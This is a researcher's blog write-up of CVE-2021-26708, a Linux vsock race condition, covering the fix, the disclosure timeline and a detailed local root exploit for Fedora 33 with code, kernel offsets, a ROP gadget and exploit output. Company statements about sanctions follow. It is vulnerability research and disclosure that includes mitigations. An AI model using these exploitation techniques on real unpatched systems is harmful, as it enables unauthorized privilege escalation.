That's strange. The pointer to the virtual socket transport is copied to a local variable before the lock_sock() call. But the vsk->transport value may change when the socket lock is not acquired! That is an obvious race condition bug. I checked the whole af_vsock.c file and found four more similar issues.

Searching the git history helped to understand the reason. Initially, the transport for a virtual socket was not able to change, so copying the value of vsk->transport to a local variable was safe. Later, the bugs were implicitly introduced by commit c0cfa2d8a788fcf4 (vsock: add multi-transports support) and commit 6a2c0962105ae8ce (vsock: prevent transport modules unloading).

Fixing this vulnerability is trivial: 

        sk = sock->sk;

        vsk = vsock_sk(sk);

-       transport = vsk->transport;

 

        lock_sock(sk);

 

+       transport = vsk->transport;

A bit odd vulnerability disclosure

On January 30, after finishing the PoC exploit, I created the fixing patch and made responsible disclosure to security@kernel.org. I got very prompt replies from Linus and Greg, and we settled on this procedure:

1.   Sending my patch to the Linux Kernel Mailing List (LKML) in public.

2.   Merging it upstream and backporting to affected stable trees.

3.   Informing distributions about the security relevance of this issue via the linux-distros mailing list.

4.   Making disclosure via oss-security@lists.openwall.com, when allowed by the distributions.

The first step is questionable. Linus decided to merge my patch right away without any disclosure embargo because the patch "doesn't look all that different from the kinds of patches we do every day." I obeyed and proposed sending it to the LKML in public. Doing so is important because anybody can find kernel vulnerability fixes by filtering kernel commits that didn't appear on the mailing lists.

On February 2, the second version of my patch was merged into netdev/net.git and then came to Linus' tree. On February 4, Greg applied it to the affected stable trees. Then I immediately informed linux-distros@vs.openwall.org that the fixed bugs are exploitable and asked how much time the Linux distributions would need before I did public disclosure.

But I got the following reply:

    If the patch is committed upstream, then the issue is public.

 

    Please send to oss-security immediately.

A bit odd. Anyway, I then requested a CVE ID at https://cve.mitre.org/cve/request_id.html and made the announcement at oss-security@lists.openwall.com.

This raises the question: is this "merge ASAP" procedure compatible with the linux-distros mailing list?

As a counter-example, when I reported CVE-2017-2636 to security@kernel.org, Kees Cook and Greg organized a one-week disclosure embargo via the linux-distros mailing list. That allowed Linux distributions to integrate my fix into their security updates in no rush and release them simultaneously.

Memory corruption

Now let's focus on exploiting CVE-2021-26708. I exploited the race condition in vsock_stream_setsockopt(). Reproducing it requires two threads. The first one calls setsockopt():

   setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,

                                &size, sizeof(unsignedlong));

The second thread should change the virtual socket transport while vsock_stream_setsockopt() is trying to acquire the socket lock. It is performed by reconnecting to the virtual socket: 

    struct sockaddr_vm addr = {

        .svm_family = AF_VSOCK,

    };

 

    addr.svm_cid =VMADDR_CID_LOCAL;

    connect(vsock, (structsockaddr *)&addr, sizeof(struct sockaddr_vm));

 

    addr.svm_cid =VMADDR_CID_HYPERVISOR;

    connect(vsock, (structsockaddr *)&addr, sizeof(struct sockaddr_vm));

To handle connect() for a virtual socket, the kernel executes vsock_stream_connect(), which calls vsock_assign_transport(). This function has some code we are interested in:

    if (vsk->transport) {

        if (vsk->transport == new_transport)

            return0;

 

        /* transport->release() must be called with sock lock acquired.

         * This path can only be taken during vsock_stream_connect(),

         * where we have already held the sock lock.

         * In the other cases, this function is called on a new socket

         * which is not assigned to any transport.

         */

        vsk->transport->release(vsk);

        vsock_deassign_transport(vsk);

    }

Note that vsock_stream_connect() holds the socket lock. Meanwhile, vsock_stream_setsockopt() in a parallel thread is trying to acquire it. Good. This is what we need for hitting the race condition.

So, on the second connect() with a different svm_cid, the vsock_deassign_transport() function is called. The function executes the transport destructor virtio_transport_destruct() and thus frees vsock_sock.trans. At this point, you might guess that use-after-free is where all this is heading :) vsk->transport is set to NULL.

When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can proceed with execution. It calls vsock_update_buffer_size(), which subsequently calls transport-> notify_buffer_size(). Here transport has an out-of-date value from a local variable that doesn't match vsk->transport (which is NULL).

The kernel executes virtio_transport_notify_buffer_size(), corrupting kernel memory:

voidvirtio_transport_notify_buffer_size(structvsock_sock *vsk, u64 *val)

{

    struct virtio_vsock_sock *vvs = vsk->trans;

 

    if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)

        *val = VIRTIO_VSOCK_MAX_BUF_SIZE;

 

    vvs->buf_alloc =*val;

 

    virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);

}


Here vvs is a pointer to kernel memory that has been freed in virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes; this object lives in the kmalloc-64 slab cache. The buf_alloc field has type u32 and resides at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value *val is controlled by the attacker, and the four least significant bytes of it are written to the freed memory.

"Fuzzing miracle"

As I mentioned, syzkaller didn't manage to reproduce this crash, and I had to develop the reproducer manually. But why did the fuzzer fail? Looking at vsock_update_buffer_size() gave the answer:

    if (val != vsk->buffer_size &&

      transport &&transport->notify_buffer_size)

        transport->notify_buffer_size(vsk, &val);

 

    vsk->buffer_size = val;

The notify_buffer_size() handler is called only if val differs from the current buffer_size. In other words, setsockopt() performing SO_VM_SOCKETS_BUFFER_SIZE should be called with different size parameters each time. I used this fun hack to hit the memory corruption in my first reproducer (source code):

    struct timespec tp;

    unsignedlong size =0;

 

    clock_gettime(CLOCK_MONOTONIC, &tp);

    size =tp.tv_nsec;

    setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,

                                &size, sizeof(unsignedlong));

Here, the size value is taken from the nanoseconds count returned by clock_gettime(), and it is likely to be different on each racing round. Upstream syzkaller without modifications doesn't do things like that. The values of syscall parameters are chosen when syzkaller generates the fuzzing input. They don't change when the fuzzer executes it on the target.

Anyway, I still don't completely understand how syzkaller managed to hit this crash ¯\_()_/¯ It looks like the fuzzer did some lucky multithreaded magic with SO_VM_SOCKETS_BUFFER_MAX_SIZE and SO_VM_SOCKETS_BUFFER_MIN_SIZE but then failed to reproduce it.

Idea! Maybe adding the ability to randomize some syscall arguments at runtime would allow syzkaller to spot more bugs like CVE-2021-26708. On the other hand, doing so could also make crash reproduction less stable.

Four bytes of power

This time I chose Fedora 33 Server as the exploitation target, with kernel version 5.10.11-200.fc33.x86_64. From the beginning, I was determined to bypass SMEP and SMAP.

To sum up, this race condition may cause write-after-free of a 4-byte controlled value to a 64-byte kernel object at offset 40. That's quite limited memory corruption. I had a hard time turning it into a real weapon. I'm going to describe the exploit based on its development timeline.

The photos come from artifacts in the collection of Russia's State Hermitage Museum. I love this wonderful museum!

As a first step, I started to work on stable heap spraying. The exploit should perform some userspace activity that makes the kernel allocate another 64-byte object at the location of the freed virtio_vsock_sock. That way, 4-byte write-after-free should corrupt the sprayed object (instead of unused free kernel memory).

I set up some quick experimental spraying with the add_key syscall. I called it several times right after the second connect() to the virtual socket, while a parallel thread finishes the vulnerable vsock_stream_setsockopt(). Tracing the kernel allocator with ftrace allowed confirming that the freed virtio_vsock_sock is overwritten. In other words, I saw that successful heap spraying was possible.

The next step in my exploitation strategy was to find a 64-byte kernel object that can provide a stronger exploit primitive when it has four corrupted bytes at offset 40. Huh… not so easy!

My first thought was to employ the iovec technique from the Bad Binder exploit by Maddie Stone and Jann Horn. The essence of it is to use a carefully corrupted iovec object for arbitrary read/write of kernel memory. However, I got a triple fail with this idea:

1.   64-byte iovec is allocated on the kernel stack, not the heap.

2.   Four bytes at offset 40 overwrite iovec.iov_len (not iovec.iov_base), so the original approach can't work.

3.   This iovec exploitation trick has been dead since Linux kernel version 4.13. Awesome Al Viro killed it with commit 09fc68dc66f7597b back in June 2017:

we have *NOT* done access_ok() recently enough; we rely upon the

iovec array having passed sanity checks back when it had been created

and not nothing having buggered it since.  However, that's very much

non-local, so we'd better recheck that.

After exhausting experiments with a handful of other kernel objects suitable for heap spraying, I found the msgsnd() syscall. It creates struct msg_msg in the kernelspace, see the pahole output:

struct msg_msg {

        struct list_head           m_list;               /*     0    16 */

        long int                   m_type;               /*    16     8 */

        size_t                     m_ts;                 /*    24     8 */

        struct msg_msgseg *        next;                 /*    32     8 */

        void *                     security;             /*    40     8 */

 

        /* size: 48, cachelines: 1, members: 5 */

        /* last cacheline: 48 bytes */

};

That is the message header, which is followed by message data. If struct msgbuf in the userspace has a 16-byte mtext, the corresponding msg_msg is created in the kmalloc-64 slab cache, just like struct virtio_vsock_sock. The 4-byte write-after-free can corrupt the void *security pointer at offset 40. Using the security field to break Linux security: irony itself!

The msg_msg.security field points to the kernel data allocated by lsm_msg_msg_alloc() and used by SELinux in the case of Fedora. It is freed by security_msg_msg_free() when msg_msg is received. Hence corrupting the first half of the security pointer (least significant bytes on little-endian x86_64) provides arbitrary free, which is a much stronger exploit primitive.


Kernel infoleak as a bonus

After achieving arbitrary free, I started to think about where to aim it—what could I free? Here I used the same trick as I did in the CVE-2019-18683 exploit. As I mentioned earlier, the second connect() to the virtual socket calls vsock_deassign_transport(), which sets vsk->transport to NULL. That makes the vulnerable vsock_stream_setsockopt() show a kernel warning when it calls virtio_transport_send_pkt_info() just after the memory corruption:

WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34

...

CPU: 1 PID: 6739 Comm: racer Tainted: G        W         5.10.11-200.fc33.x86_64 #1

Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014

RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]

...

RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246

RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80

RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0

RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000

R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008

R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0

FS:  00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0

Call Trace:

  virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]

  vsock_update_buffer_size+0x5f/0x70 [vsock]

  vsock_stream_setsockopt+0x128/0x270 [vsock]

...

A quick debugging session with gdb showed that the RCX register contains the kernel address of the freed virtio_vsock_sock and the RBX register contains the kernel address of vsock_sock. Excellent! On Fedora I can open and parse /dev/kmsg: if one more warning appears in the kernel log, then the exploit won one more race and it can extract the corresponding kernel addresses from the registers.


From arbitrary free to use-after-free

My exploitation plan was to use arbitrary free for use-after-free:

1.   Free an object at the kernel address leaked in the kernel warning.

2.   Perform heap spraying to overwrite that object with controlled data.

3.   Do privilege escalation using the corrupted object.

At first, I wanted to exploit arbitrary free against the vsock_sock address (from RBX), because this is a big structure that contains a lot of interesting things. But that didn't work, since it lives in a dedicated slab cache where I can't perform heap spraying. So I don't know whether use-after-free exploitation on vsock_sock is possible.

Another option is to free the address from RCX. I started to search for a 64-byte kernel object that is interesting for use-after-free (containing kernel pointers, for example). Moreover, the exploit in the userspace should somehow make the kernel put that object at the location of the freed virtio_vsock_sock. Searching for a kernel object to fit these requirements was an enormous pain! I even used the input corpus of my fuzzer and automated that search.

In parallel, I was learning the internals of System V message implementation, since I had already used msg_msg for heap spraying in this exploit. And then I got an insight on how to exploit use-after-free on msg_msg.

Achieving arbitrary read

The kernel implementation of a System V message has maximum size DATALEN_MSG, which is PAGE_SIZE minus sizeof(struct msg_msg)). If you send a bigger message, the remainder is saved in a list of message segments. The msg_msg structure has struct msg_msgseg *next, which points to the first segment, and size_t m_ts, which stores the whole size.

Cool! I can put the controlled values in msg_msg.m_ts and msg_msg.next when I overwrite the message after executing arbitrary free for it:


Note that I don't overwrite msg_msg.security, in order to avoid breaking SELinux permission checks. That is possible using the wonderful setxattr() & userfaultfd() heap spraying technique by Vitaly NikolenkoTip: I place the spraying payload at the border of the page faulting memory region so that copy_from_user() hangs just before overwriting msg_msg.security. See the code preparing the payload:

#define PAYLOAD_SZ 40

 

voidadapt_xattr_vs_sysv_msg_spray(unsignedlong kaddr)

{

    struct msg_msg *msg_ptr;

 

    xattr_addr =spray_data + PAGE_SIZE *4- PAYLOAD_SZ;

 

    /* Don't touch the second part to avoid breaking page fault delivery */

    memset(spray_data, 0xa5, PAGE_SIZE *4);

 

    printf("[+] adapt the msg_msg spraying payload:\n");

    msg_ptr = (struct msg_msg *)xattr_addr;

    msg_ptr->m_type =0x1337;

    msg_ptr->m_ts = ARB_READ_SZ;

    msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */

    printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",

           msg_ptr,

           msg_ptr->m_type, &(msg_ptr->m_type),

           msg_ptr->m_ts, &(msg_ptr->m_ts),

           msg_ptr->next, &(msg_ptr->next));

}

But how do we read the kernel data using this crafted msg_msg? Receiving this message requires manipulations with the System V message queue, which breaks the kernel because the msg_msg.m_list pointer is invalid (0xa5a5a5a5a5a5a5a5 in my case). My first idea was setting this pointer to the address of another good message, but that caused the kernel to hang because the message list traversal can't finish.

Reading the documentation for the msgrcv() syscall helped to find a better solution: I used msgrcv() with the MSG_COPY flag:

MSG_COPY (since Linux 3.8)

        Nondestructively fetch a copy of the message at the ordinal position  in  the  queue

        specified by msgtyp (messages are considered to be numbered starting at 0).


This flag makes the kernel copy the message data to the userspace without removing it from the message queue. Nice! MSG_COPY is available if the kernel has CONFIG_CHECKPOINT_RESTORE=y, which is true for Fedora Server.

Arbitrary read: step-by-step procedure

Here is the step-by-step procedure that my exploit uses for arbitrary read of kernel memory:

1.   Make preparations:

·     Count CPUs available for racing using sched_getaffinity() and CPU_COUNT() (the exploit needs at least two).

·     Open /dev/kmsg for parsing.

·     mmap() the spray_data memory area and configure userfaultfd() for the last part of it.

·     Start a separate pthread for handling userfaultfd() events.

·     Start 127 pthreads for setxattr() & userfaultfd() heap spraying over msg_msg and hang them on a pthread_barrier.


2.   Get the kernel address of a good msg_msg:

·     Win the race on a virtual socket, as described earlier.

·     Wait for 35 microseconds in a busy loop after the second connect().

·     Call msgsnd() for a separate message queue; the msg_msg object is placed at the virtio_vsock_sock location after the memory corruption.

·     Parse the kernel log and save the kernel address of this good msg_msg from the kernel warning (RCX register).

·     Also, save the kernel address of the vsock_sock object from the RBX register.


3.   Execute arbitrary free against good msg_msg using a corrupted msg_msg:

·     Use four bytes of the address of good msg_msg for SO_VM_SOCKETS_BUFFER_SIZE; that value will be used for the memory corruption.

·     Win the race on a virtual socket.

·     Call msgsnd() right after the second connect(); the msg_msg is placed at the virtio_vsock_sock location and corrupted.

·     Now the security pointer of the corrupted msg_msg stores the address of the good msg_msg (from step 2).



 

·     If the memory corruption of msg_msg.security from the setsockopt() thread happens during msgsnd() handling, then the SELinux permission check fails.

·     In that case, msgsnd() returns -1 and the corrupted msg_msg is destroyed; freeing msg_msg.security frees the good msg_msg.


4.   Overwrite the good msg_msg with a controlled payload:

·     Right after a failed msgsnd() the exploit calls pthread_barrier_wait(), which wakes 127 spraying pthreads.

·     These pthreads execute setxattr() with a payload that has been prepared with adapt_xattr_vs_sysv_msg_spray(vsock_kaddr), described earlier.

·     Now the good msg_msg is overwritten with the controlled data and msg_msg.next pointer to the System V message segment stores the address of the vsock_sock object.


 

5.  Read the contents of the vsock_sock kernel object to the userspace by receiving a message from the message queue that stores the overwritten msg_msg:

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,

                IPC_NOWAIT | MSG_COPY |MSG_NOERROR);


This part of the exploit is very reliable.

Sorting the loot

Now my "weapons" had given me some good loot: I got the contents of the vsock_sock kernel object. It took me some time to sort it out and find good attack targets for further exploit steps.


 Here's what I found inside:

·     Plenty of pointers to objects from dedicated slab caches, such as PINGv6 and sock_inode_cache. These are not interesting.

·     struct mem_cgroup *sk_memcg pointer living in vsock_sock.sk at offset 664. The mem_cgroup structure is allocated in the kmalloc-4k slab cache. Good!

·     const struct cred *owner pointer living in vsock_sock at offset 840. It stores the address of the credentials that I want to overwrite for privilege escalation.

·     void (*sk_write_space)(struct sock *) function pointer in vsock_sock.sk at offset 688. It is set to the address of the sock_def_write_space() kernel function. That can be used for calculating the KASLR offset.

Here is how the exploit extracts these pointers from the memory dump:

#define MSG_MSG_SZ              48

#define DATALEN_MSG             (PAGE_SIZE - MSG_MSG_SZ)

#define SK_MEMCG_OFFSET         664

#define SK_MEMCG_RD_LOCATION    (DATALEN_MSG + SK_MEMCG_OFFSET)

#define OWNER_CRED_OFFSET       840

#define OWNER_CRED_RD_LOCATION  (DATALEN_MSG + OWNER_CRED_OFFSET)

#define SK_WRITE_SPACE_OFFSET   688

#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)

 

/*

 * From Linux kernel 5.10.11-200.fc33.x86_64:

 *   function pointer for calculating KASLR secret

 */

#define SOCK_DEF_WRITE_SPACE    0xffffffff819851b0lu

 

unsignedlong sk_memcg =0;

unsignedlong owner_cred =0;

unsignedlong sock_def_write_space =0;

unsignedlong kaslr_offset =0;

 

/* ... */

 

    sk_memcg =kmem[SK_MEMCG_RD_LOCATION /sizeof(uint64_t)];

    printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",

                        sk_memcg, SK_MEMCG_RD_LOCATION);

 

    owner_cred =kmem[OWNER_CRED_RD_LOCATION /sizeof(uint64_t)];

    printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",

                        owner_cred, OWNER_CRED_RD_LOCATION);

 

    sock_def_write_space =kmem[SK_WRITE_SPACE_RD_LOCATION /sizeof(uint64_t)];

    printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",

                        sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);

 

    kaslr_offset =sock_def_write_space -SOCK_DEF_WRITE_SPACE;

    printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);

The cred structure is allocated in the dedicated cred_jar slab cache. Even if I execute my arbitrary free against it, I can't overwrite it with the controlled data (or at least I don't know how to). That's too bad, since it would be the best solution.

So I focused on the mem_cgroup object. I tried to call kfree() for it, but the kernel panicked instantly. Looks like the kernel uses this object quite intensively, alas. But here I remembered my good old privilege escalation tricks.

Use-after-free on sk_buff

When I exploited CVE-2017-2636 in the Linux kernel back in 2017, I turned double free for a kmalloc-8192 object into use-after-free on sk_buff. I decided to repeat that trick.

A network-related buffer in the Linux kernel is represented by struct sk_buff. This object has skb_shared_info with destructor_arg, which can be used for control flow hijacking. The network data and skb_shared_info are placed in the same kernel memory block pointed to by sk_buff.head. Hence creating a 2800-byte network packet in the userspace will make skb_shared_info be allocated in the kmalloc-4k slab cache, where mem_cgroup objects live as well.

So I implemented the following procedure:

1.   Create one client socket and 32 server sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP).

2.   Prepare a 2800-byte buffer in the userspace and do memset() with 0x42 for it.

3.   Send this buffer from the client socket to each server socket using sendto(). That creates sk_buff objects in kmalloc-4k. Do that on each available CPU using sched_setaffinity() (this is important because slab caches are per-CPU).

4.   Perform the arbitrary read procedure for vsock_sock (described earlier).

5.   Calculate the possible sk_buff kernel address as sk_memcg plus 4096 (the next element in kmalloc-4k).

6.   Perform the arbitrary read procedure for this possible sk_buff address.

7.   If 0x4242424242424242lu is found at the location of network data, then the real sk_buff is found, go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6.

8.   Start 32 pthreads for setxattr() & userfaultfd() heap spraying over sk_buff and hang them on a pthread_barrier.

9.   Perform arbitrary free against the sk_buff kernel address.

10.      Call pthread_barrier_wait(), which wakes 32 spraying pthreads that execute setxattr() overwriting skb_shared_info.

11.      Receive the network messages using recv() for the server sockets.

When the sk_buff object with overwritten skb_shared_info is received, the kernel executes the destructor_arg callback, which performs an arbitrary write of kernel memory and escalates user privileges. How? Keep reading!

I should note that this part, with use-after-free on sk_buff, is the exploit's main source of instability. It would be nice to find a better kernel object that can be allocated in kmalloc-* slab caches and exploited for turning use-after-free into arbitrary read/write of kernel memory.

Arbitrary write with skb_shared_info

Let's look at the code that prepares the payload for overwriting the sk_buff object:

#define SKB_SIZE                4096

#define SKB_SHINFO_OFFSET       3776

#define MY_UINFO_OFFSET         256

#define SKBTX_DEV_ZEROCOPY      (1 << 3)

 

voidprepare_xattr_vs_skb_spray(void)

{

    struct skb_shared_info *info =NULL;

 

    xattr_addr =spray_data + PAGE_SIZE *4- SKB_SIZE +4;

 

    /* Don't touch the second part to avoid breaking page fault delivery */

    memset(spray_data, 0x0, PAGE_SIZE *4);

 

    info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);

    info->tx_flags = SKBTX_DEV_ZEROCOPY;

    info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;

 

    uinfo_p = (struct ubuf_info *)(xattr_addr +MY_UINFO_OFFSET);


The skb_shared_info structure resides in the sprayed data exactly at the offset SKB_SHINFO_OFFSET, which is 3776 bytes. The skb_shared_info.destructor_arg pointer stores the address of struct ubuf_info. I create a fake ubuf_info at MY_UINFO_OFFSET in the network buffer itself. This is possible since the kernel address of the attacked sk_buff is known. Here is the payload layout:


 Now about the destructor_arg callback:

    /*

     * A single ROP gadget for arbitrary write:

     *   mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret

     * Here rdi stores uinfo_p address, rcx is 0, rsi is 1

     */

    uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;

    uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /*value for "qword ptr [rdi + 8]"*/

    uinfo_p->desc = uinfo_p->desc -1; /* rsi value 1 should not get into euid */

I invented a very strange arbitrary write primitive that you can see here. I couldn't find a stack pivoting gadget in vmlinuz-5.10.11-200.fc33.x86_64 that would work with my constraints… so I performed arbitrary write in one shot :)


The callback function pointer stores the address of a single ROP gadget. The RDI register stores the first argument of the callback function, which is the address of ubuf_info itself. So RDI + 8 points to ubuf_info.desc. The gadget moves ubuf_info.desc to RDX. Now RDX contains the address of the effective user ID and group ID, minus one byte. That byte is important: when the gadget writes qword with 1 from RSI to the memory pointed to by RDX, the effective uid and gid are overwritten by zeros.

Then the same procedure is repeated for uid and gid. Privileges are escalated to root. Game over.

Exploit output that displays the whole procedure:

[a13x@localhost ~]$ ./vsock_pwn

 

=================================================

==== CVE-2021-26708 PoC exploit by a13xp0p0v ====

=================================================

 

[+] begin as: uid=1000, euid=1000

[+] we have 2 CPUs for racing

[+] getting ready...

[+] remove old files for ftok()

[+] spray_data at 0x7f0d9111d000

[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000

[+] fault_handler for uffd 38 is ready

 

[+] stage I: collect good msg_msg locations

[+] go racing, show wins:

        save msg_msg ffff9125c25a4d00 in msq 11 in slot 0

        save msg_msg ffff9125c25a4640 in msq 12 in slot 1

        save msg_msg ffff9125c25a4780 in msq 22 in slot 2

        save msg_msg ffff9125c3668a40 in msq 78 in slot 3

 

[+] stage II: arbitrary free msg_msg using corrupted msg_msg

        kaddr for arb free: ffff9125c25a4d00

        kaddr for arb read: ffff9125c2035300

[+] adapt the msg_msg spraying payload:

        msg_ptr 0x7f0d91120fd8

        m_type 1337 at 0x7f0d91120fe8

        m_ts 6096 at 0x7f0d91120ff0

        msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8

[+] go racing, show wins:

 

[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)

[+] msgrcv returned 6096 bytes

[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)

[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)

[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)

[+] Calculated kaslr offset: 2a000000

 

[+] stage IV: search sprayed skb near sk_memcg...

[+] checking possible skb location: ffff9125c42fa000

[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg

        kaddr for arb free: ffff9125c25a4640

        kaddr for arb read: ffff9125c42fa030

[+] adapt the msg_msg spraying payload:

        msg_ptr 0x7f0d91120fd8

        m_type 1337 at 0x7f0d91120fe8

        m_ts 6096 at 0x7f0d91120ff0

        msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8

[+] go racing, show wins: 0 0 20 15 42 11

[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)

[+] msgrcv returned 6096 bytes

[+] found a real skb

 

[+] stage V: try to do UAF on skb at ffff9125c42fa000

[+] skb payload:

        start at 0x7f0d91120004

        skb_shared_info at 0x7f0d91120ec4

        tx_flags 0x8

        destructor_arg 0xffff9125c42fa100

        callback 0xffffffffab64f6d4

        desc 0xffff9125c3fd6e53

[+] go racing, show wins: 15

 

[+] stage VI: repeat UAF on skb at ffff9125c42fa000

[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30

 

[+] finish as: uid=0, euid=0

[+] starting the root shell...

uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Possible exploit mitigations

Several technologies could prevent exploitation of CVE-2021-26708 or at least make it harder.

1.   Exploiting this vulnerability is impossible with the Linux kernel heap quarantine, since the memory corruption happens very shortly after the race condition. Read about my SLAB_QUARANTINE prototype in a separate article.

2.   MODHARDEN from the grsecurity patch prevents kernel module autoloading by unprivileged users.

3.   Setting /proc/sys/vm/unprivileged_userfaultfd to 0 would block the described method of keeping the payload in the kernelspace. That toggle restricts userfaultfd() to only privileged users (with the SYS_CAP_PTRACE capability).

4.   Setting kernel.dmesg_restrict sysctl to 1 would block infoleak via the kernel log; that sysctl restricts the ability of unprivileged users to read the kernel syslog via dmesg.

5.   Control Flow Integrity could prevent calling my ROP gadget. You can see these technologies on the Linux Kernel Defence Map that I maintain.

6.   Hopefully, future versions of the Linux kernel will have support for the ARM Memory Tagging Extension (MTE) to mitigate use-after-free on ARM.

7.   I have heard rumors of a grsecurity Wunderwaffe called AUTOSLAB. We don't know much about it. Presumably, it makes Linux allocate kernel objects in separate slab caches depending on the object type. That could ruin the heap spraying technique that I use heavily in this exploit.

Closing words

Investigating, fixing CVE-2021-26708, and developing the PoC exploit was an interesting and exhausting journey.

I managed to turn a race condition with very limited memory corruption into arbitrary read/write of kernel memory and privilege escalation on Fedora 33 Server for x86_64, bypassing SMEP and SMAP. During this research, I've created several new vulnerability exploitation tricks for the Linux kernel.


I believe writing this article is important for the Linux kernel community as a way to come up with new ideas for improving kernel security. I hope you have enjoyed reading it!

And, of course, I thank Positive Technologies for giving me the opportunity to work on this research.

Author: Alexander Popov, Positive Technologies

Positive Technologies' official statement following U.S. sanctions

$
0
0

As a company, we deny the groundless accusations made by the U.S. Department of the Treasury. In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies’ research being used in violation of the principles of business transparency and the ethical exchange of information with professional information security community.

Our global mission is to create products and technologies to improve cybersecurity around the world and to ensure conditions for the most efficient prevention of cyberattacks for the benefit of society, business, and government agencies. We do this regardless of geopolitical situation, with maximum openness and a focus on cooperation (including international cooperation).

Our technologies are used around the world, with thousands of companies in various fields of business as well as the government agencies of different countries trusting us to keep them safe. We have over 1,100 employees and earned RUB 5.6 billion according to the Russian Accounting Standards ($73 million) in 2020 (an increase of 55 percent from 2019). Over the last five years, our average growth has been 41 percent. We have been regularly rated by international research and advisory agencies as one of the fastest growing visionary companies that develop security and vulnerability management solutions.

Despite the fact that we are not a public company, the market evaluates our capitalization as high  several billion dollars. This demonstrates the level of interest in our technologies and a serious level of trust in the company. To maintain this trust, we adhere to the principles of maximum openness at all levels of our activities: from research to business, including the company's financial statements.

We are known to the global cybersecurity community as visionaries and leaders in ethical security research. Our researchers detect hundreds of zero-day vulnerabilities per year in IT systems of various classes and types. All of the vulnerabilities found, without exception, are provided to the software manufacturers as part of the responsible disclosure policy and are not made public until the necessary updates are released. Each such research is highly evaluated by the system manufacturers and is used to increase information security of their final product.

The traditions of transparency and openness are also reflected in Positive Hack Days, a forum that we have been holding since 2011. PHDays is a public platform for the exchange of expertise, learning, and advanced training in cybersecurity. Every year the forum attracts thousands of cybersecurity and business experts from different countries, representatives of the CTF movement, scientists, students, and even schoolchildren. Because of the pandemic, we have switched to a hybrid format, and, therefore, everything that happens at PHDays can be viewed by a wide audience online. We also provide simultaneous translation into English so that anyone from any part of the world can watch a presentation that is of interest to them. The event is fully open to watch and participate.

We truly think that geopolitics should not be a barrier to the technological development of society and we will continue to do what we do best—to protect and ensure cybersecurity around the world. That is why we continue to work under normal conditions, in full compliance with all of our obligations to our customers, partners, and employees.

Open letter to the research community

$
0
0



Dear all,

In light of recent events, we have received many words of encouragement in comments on social media, through direct messages, and over the phone. We truly appreciate your support. It means a lot to us.

Over the years, we have detected and helped fix a huge number of vulnerabilities in applications and hardware from almost all renowned vendors, such as Cisco, Citrix, Intel, Microsoft, Siemens, and VMware.

All this would be impossible without close collaboration with the best infosec researchers, or without vendors' proactive approach and willingness to cooperate with research centers like ours in fixing all detected vulnerabilities. In line with the responsible disclosure policy, we only announce new vulnerabilities by agreement with vendors, and only after the vendor itself confirms it has fixed the bug and delivered the patch to customers.

We believe this approach makes our world better and more secure.

To unite our community, we started Positive Hack Days (PHDays), the biggest international security forum in Russia. Cybersecurity specialists and business leaders now have an opportunity to connect with white hats and cybersecurity geeks who know firsthand what a true pentest is and are willing to share their experience.

